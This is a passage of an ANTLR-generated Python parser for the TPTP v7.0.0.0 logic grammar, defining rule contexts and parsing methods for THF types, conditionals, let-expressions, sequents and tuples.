self.enterOuterAlt(localctx, 4)
self.state = 631
self.system_functor()
self.state = 632
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 633
self.thf_arguments()
self.state = 634
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_conn_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_pair_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_pair_connectiveContext,0)
def assoc_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Assoc_connectiveContext,0)
def thf_unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unary_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_conn_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_conn_term" ):
listener.enterThf_conn_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_conn_term" ):
listener.exitThf_conn_term(self)
def thf_conn_term(self):
localctx = tptp_v7_0_0_0Parser.Thf_conn_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 60, self.RULE_thf_conn_term)
try:
self.state = 641
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand, tptp_v7_0_0_0Parser.Infix_inequality, tptp_v7_0_0_0Parser.Infix_equality, tptp_v7_0_0_0Parser.Assignment]:
self.enterOuterAlt(localctx, 1)
self.state = 638
self.thf_pair_connective()
pass
elif token in [tptp_v7_0_0_0Parser.Or, tptp_v7_0_0_0Parser.And]:
self.enterOuterAlt(localctx, 2)
self.state = 639
self.assoc_connective()
pass
elif token in [tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.ForallComb, tptp_v7_0_0_0Parser.ExistsComb, tptp_v7_0_0_0Parser.ChoiceComb, tptp_v7_0_0_0Parser.DescriptionComb, tptp_v7_0_0_0Parser.EqComb]:
self.enterOuterAlt(localctx, 3)
self.state = 640
self.thf_unary_connective()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_conditionalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_conditional
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_conditional" ):
listener.enterThf_conditional(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_conditional" ):
listener.exitThf_conditional(self)
def thf_conditional(self):
localctx = tptp_v7_0_0_0Parser.Thf_conditionalContext(self, self._ctx, self.state)
self.enterRule(localctx, 62, self.RULE_thf_conditional)
try:
self.enterOuterAlt(localctx, 1)
self.state = 643
self.match(tptp_v7_0_0_0Parser.T__14)
self.state = 644
self.thf_logic_formula()
self.state = 645
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 646
self.thf_logic_formula()
self.state = 647
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 648
self.thf_logic_formula()
self.state = 649
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_letContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,0)
def thf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_let
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_let" ):
listener.enterThf_let(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_let" ):
listener.exitThf_let(self)
def thf_let(self):
localctx = tptp_v7_0_0_0Parser.Thf_letContext(self, self._ctx, self.state)
self.enterRule(localctx, 64, self.RULE_thf_let)
try:
self.enterOuterAlt(localctx, 1)
self.state = 651
self.match(tptp_v7_0_0_0Parser.T__15)
self.state = 652
self.thf_unitary_formula()
self.state = 653
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 654
self.thf_formula()
self.state = 655
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_argumentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_formula_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formula_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_arguments
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_arguments" ):
listener.enterThf_arguments(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_arguments" ):
listener.exitThf_arguments(self)
def thf_arguments(self):
localctx = tptp_v7_0_0_0Parser.Thf_argumentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 66, self.RULE_thf_arguments)
try:
self.enterOuterAlt(localctx, 1)
self.state = 657
self.thf_formula_list()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_type_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_typeable_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_typeable_formulaContext,0)
def thf_top_level_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_top_level_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_type_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_type_formula" ):
listener.enterThf_type_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_type_formula" ):
listener.exitThf_type_formula(self)
def thf_type_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_type_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 68, self.RULE_thf_type_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 659
self.thf_typeable_formula()
self.state = 660
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 661
self.thf_top_level_type()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_typeable_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_atomContext,0)
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_typeable_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_typeable_formula" ):
listener.enterThf_typeable_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_typeable_formula" ):
listener.exitThf_typeable_formula(self)
def thf_typeable_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_typeable_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 70, self.RULE_thf_typeable_formula)
try:
self.state = 668
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Or, tptp_v7_0_0_0Parser.And, tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand, tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.ForallComb, tptp_v7_0_0_0Parser.Infix_inequality, tptp_v7_0_0_0Parser.Infix_equality, tptp_v7_0_0_0Parser.ExistsComb, tptp_v7_0_0_0Parser.ChoiceComb, tptp_v7_0_0_0Parser.DescriptionComb, tptp_v7_0_0_0Parser.EqComb, tptp_v7_0_0_0Parser.Assignment, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 1)
self.state = 663
self.thf_atom()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 664
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 665
self.thf_logic_formula()
self.state = 666
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_subtypeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_atom(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_atomContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_atomContext,i)
def Subtype_sign(self):
return self.getToken(tptp_v7_0_0_0Parser.Subtype_sign, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_subtype
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_subtype" ):
listener.enterThf_subtype(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_subtype" ):
listener.exitThf_subtype(self)
def thf_subtype(self):
localctx = tptp_v7_0_0_0Parser.Thf_subtypeContext(self, self._ctx, self.state)
self.enterRule(localctx, 72, self.RULE_thf_subtype)
try:
self.enterOuterAlt(localctx, 1)
self.state = 670
self.thf_atom()
self.state = 671
self.match(tptp_v7_0_0_0Parser.Subtype_sign)
self.state = 672
self.thf_atom()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_top_level_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_typeContext,0)
def thf_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_mapping_typeContext,0)
def thf_apply_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_apply_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_top_level_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_top_level_type" ):
listener.enterThf_top_level_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_top_level_type" ):
listener.exitThf_top_level_type(self)
def thf_top_level_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_top_level_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 74, self.RULE_thf_top_level_type)
try:
self.state = 677
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,25,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 674
self.thf_unitary_type()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 675
self.thf_mapping_type()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 676
self.thf_apply_type()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_unitary_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_unitary_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_unitary_type" ):
listener.enterThf_unitary_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_unitary_type" ):
listener.exitThf_unitary_type(self)
def thf_unitary_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_unitary_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 76, self.RULE_thf_unitary_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 679
self.thf_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_apply_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_apply_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_apply_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_apply_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_apply_type" ):
listener.enterThf_apply_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_apply_type" ):
listener.exitThf_apply_type(self)
def thf_apply_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_apply_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 78, self.RULE_thf_apply_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 681
self.thf_apply_formula(0)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_binary_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_mapping_typeContext,0)
def thf_xprod_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_xprod_typeContext,0)
def thf_union_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_union_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_binary_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_binary_type" ):
listener.enterThf_binary_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_binary_type" ):
listener.exitThf_binary_type(self)
def thf_binary_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_binary_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 80, self.RULE_thf_binary_type)
try:
self.state = 686
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,26,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 683
self.thf_mapping_type()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 684
self.thf_xprod_type(0)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 685
self.thf_union_type(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_mapping_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_type(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_typeContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_typeContext,i)
def Arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Arrow, 0)
def thf_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_mapping_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_mapping_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_mapping_type" ):
listener.enterThf_mapping_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_mapping_type" ):
listener.exitThf_mapping_type(self)
def thf_mapping_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_mapping_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 82, self.RULE_thf_mapping_type)
try:
self.state = 696
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,27,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 688
self.thf_unitary_type()
self.state = 689
self.match(tptp_v7_0_0_0Parser.Arrow)
self.state = 690
self.thf_unitary_type()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 692
self.thf_unitary_type()
self.state = 693
self.match(tptp_v7_0_0_0Parser.Arrow)
self.state = 694
self.thf_mapping_type()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_xprod_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_type(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_typeContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_typeContext,i)
def Star(self):
return self.getToken(tptp_v7_0_0_0Parser.Star, 0)
def thf_xprod_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_xprod_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_xprod_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_xprod_type" ):
listener.enterThf_xprod_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_xprod_type" ):
listener.exitThf_xprod_type(self)
def thf_xprod_type(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_xprod_typeContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 84
self.enterRecursionRule(localctx, 84, self.RULE_thf_xprod_type, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 699
self.thf_unitary_type()
self.state = 700
self.match(tptp_v7_0_0_0Parser.Star)
self.state = 701
self.thf_unitary_type()
self._ctx.stop = self._input.LT(-1)
self.state = 708
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,28,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_xprod_typeContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_xprod_type)
self.state = 703
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 704
self.match(tptp_v7_0_0_0Parser.Star)
self.state = 705
self.thf_unitary_type()
self.state = 710
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,28,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_union_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_type(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_typeContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_typeContext,i)
def Plus(self):
return self.getToken(tptp_v7_0_0_0Parser.Plus, 0)
def thf_union_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_union_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_union_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_union_type" ):
listener.enterThf_union_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_union_type" ):
listener.exitThf_union_type(self)
def thf_union_type(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_union_typeContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 86
self.enterRecursionRule(localctx, 86, self.RULE_thf_union_type, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 712
self.thf_unitary_type()
self.state = 713
self.match(tptp_v7_0_0_0Parser.Plus)
self.state = 714
self.thf_unitary_type()
self._ctx.stop = self._input.LT(-1)
self.state = 721
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,29,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_union_typeContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_union_type)
self.state = 716
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 717
self.match(tptp_v7_0_0_0Parser.Plus)
self.state = 718
self.thf_unitary_type()
self.state = 723
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,29,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_sequentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_tuple(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_tupleContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_tupleContext,i)
def Gentzen_arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Gentzen_arrow, 0)
def thf_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_sequent
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_sequent" ):
listener.enterThf_sequent(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_sequent" ):
listener.exitThf_sequent(self)
def thf_sequent(self):
localctx = tptp_v7_0_0_0Parser.Thf_sequentContext(self, self._ctx, self.state)
self.enterRule(localctx, 88, self.RULE_thf_sequent)
try:
self.state = 732
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__11, tptp_v7_0_0_0Parser.T__16, tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18]:
self.enterOuterAlt(localctx, 1)
self.state = 724
self.thf_tuple()
self.state = 725
self.match(tptp_v7_0_0_0Parser.Gentzen_arrow)
self.state = 726
self.thf_tuple()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 728
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 729
self.thf_sequent()
self.state = 730
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_tupleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_formula_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formula_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_tuple
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_tuple" ):
listener.enterThf_tuple(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_tuple" ):
listener.exitThf_tuple(self)
def thf_tuple(self):
localctx = tptp_v7_0_0_0Parser.Thf_tupleContext(self, self._ctx, self.state)
self.enterRule(localctx, 90, self.RULE_thf_tuple)
try:
self.state = 744
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 734
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 735
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 736
self.thf_formula_list()
self.state = 737
self.match(tptp_v7_0_0_0Parser.T__12)
pass
elif token in [tptp_v7_0_0_0Parser.T__17]:
self.enterOuterAlt(localctx, 3)
self.state = 739
self.match(tptp_v7_0_0_0Parser.T__17)
pass
elif token in [tptp_v7_0_0_0Parser.T__18]:
self.enterOuterAlt(localctx, 4)
self.state = 740
self.match(tptp_v7_0_0_0Parser.T__18)
self.state = 741
self.thf_formula_list()
self.state = 742
self.match(tptp_v7_0_0_0Parser.T__19)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_formula_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_formula_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_formula_list" ):
listener.enterThf_formula_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_formula_list" ):
listener.exitThf_formula_list(self)
def thf_formula_list(self):
localctx = tptp_v7_0_0_0Parser.Thf_formula_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 92, self.RULE_thf_formula_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 746
self.thf_logic_formula()
self.state = 751
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 747
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 748
self.thf_logic_formula()
self.state = 753
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tfx_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tfx_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tfx_logic_formulaContext,0)
def thf_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tfx_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTfx_formula" ):
listener.enterTfx_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTfx_formula" ):
listener.exitTfx_formula(self)
def tfx_formula(self):
localctx = tptp_v7_0_0_0Parser.Tfx_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 94, self.RULE_tfx_formula)
try:
self.state = 756
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,33,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 754
self.tfx_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 755
self.thf_sequent()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tfx_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tfx_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTfx_logic_formula" ):
listener.enterTfx_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTfx_logic_formula" ):
listener.exitTfx_logic_formula(self)
